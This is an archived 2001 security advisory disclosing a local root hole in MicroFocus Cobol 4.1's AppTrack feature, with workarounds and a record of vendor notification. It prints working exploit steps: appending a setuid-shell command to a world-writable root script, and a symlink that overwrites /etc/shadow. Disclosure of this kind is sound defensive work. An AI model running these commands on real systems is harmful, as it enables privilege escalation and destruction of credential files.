OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Dixie Flatline (echo8FIREST0RM.ORG)
Date: Sun Feb 11 2001 - 19:58:53 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Summary
    -------

    If the AppTrack feature is enabled, the default install of MicroFocus
    Cobol 4.1 (Merant's commercial suite of cobol utilities) contains a
    security hole which can lead to root compromise.

    Specifics
    ---------

    In the default install, /var/mfaslmf is installed mode 777, and
    /var/mfaslmf/nolicense is installed mode 666. nolicense also contains the
    following:

    # Append into a logfile
    if test ! -f /var/mfaslmf/USERLOG
    then
            touch /var/mfaslmf/USERLOG
            chmod 666 /var/mfaslmf/USERLOG
    fi
    echo `date`:No license $* >> /var/mfaslmf/USERLOG

    #mail a specified user (commented out by default. substitute the user
    name)
    echo `date`:No license $* > /var/mfaslmf/tmpmess
    # mail -s "No AS license" user-name < /var/mfaslmf/tmpmess
    rm /var/mfaslmf/tmpmess

    This presents two major types of problem:

    * Because of the permissions on nolicense, unprivileged users can edit the
    file to insert arbitrary commands into the script. Then, if AppTrack is
    enabled (see below) and the trigger condition occurs (again, see below),
    that code can be executed with superuser privileges.

    * The use of predictably-named temporary files in a world-writeable
    directory can allow local users to append, overwrite or destroy arbitrary
    files, even if nolicense itself is made non-world-writeable.

    Examples
    --------

    Of the first problem:

    $ id
    uid=500(echo8) gid=10(users)
    $ cat >> /var/mfaslmf/nolicense
    /bin/cp /bin/ksh /tmp; chmod 4755 /tmp/ksh
    ^D

    # create a condition under which all available AS licenses are used up.
    # This should not be difficult. When this occurs, /var/mfaslmf/nolicense
    # will run.

    $ ls -alt /tmp/ksh
    -rwsr-xr-x 1 root other 186356 Dec 26 17:04 /tmp/ksh
    $ /tmp/ksh
    # id
    uid=500(echo8) gid=10(users) euid=0(root)
    #

    Of the second:

    $ id
    uid=500(echo8) gid=10(users)
    $ cd /var/mfaslmf
    $ ln -s /etc/shadow tmpmess

    # Again, create a condition under which nolicense will run. This
    # example will overwrite /etc/shadow.

    $ cat /etc/shadow (would need to done as root, but you get the point...)
    Tue Dec 26 17:08:45 EST 2000:No license
    $

    Conditions
    ----------

    These holes can only be exploited if the AppTrack functionality is enabled.
    This feature is off by default.

    Vulnerable Versions
    -------------------

    4.1 for Solaris/sparc - only version tested.

    Workarounds
    -----------

    Change the permissions on /var/mfaslmf and rewrite nolicense. According to
    the documentation, nolicense is provided as "an example" and the user "can
    edit the nolicense script to your requirements." IMO, example code with
    serious security holes should NOT be distributed. If you don't need this
    feature, delete the script. Regardless of whether or not you need AppTrack
    to work, you should be able to change the permissions on /var/mfaslmf to
    something safer.

    Vendor Notification
    -------------------

    The vendor was notified on 12/26/2000.

    Send comments to echo8gh0st.net